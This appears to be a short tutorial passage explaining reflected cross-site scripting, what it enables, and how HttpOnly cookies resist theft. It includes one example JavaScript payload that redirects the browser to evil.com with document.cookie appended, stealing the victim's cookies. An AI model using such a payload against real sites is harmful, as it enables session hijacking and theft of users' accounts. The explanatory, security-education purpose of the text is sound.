Reflected Cross-site Scripting (XSS) is one of the most widely exploited web application flaws. To exploit this vulnerability, the application uses one or more parameters as an input, which is reflected back to the web page (source code) generated by the application. This may not sound dangerous at the moment but this flaw can be exploited to do one of the following things or more:
– Execute malicious JavaScript code.
– Bypass CSRF protections
– Execute client-side exploits
– Track victims.
– Temporary defacements and other problems.
The first example is of quite a concern, as this enables an attacker to execute client-side JavaScript code of his choice to be rendered and executed by the web browser of the victim or the viewer viewing the page. In this situation, it gets worse when the session or other essential cookies of the user are available to be stolen through the “document.cookie” property of JavaScript.
Consider the following JavaScript code:
“window.location=’http://evil.com/?cookie=’+document.cookie”
The previous code, if executed on a web browser, it will transfer all the cookies that fall under the origin of the web page to evil.com as soon as it gets loaded. However, there is an exception; cookies marked with HttpOnly will not be transferred as this acts as a protective measure to stop marked cookies from being reached through document.cookie.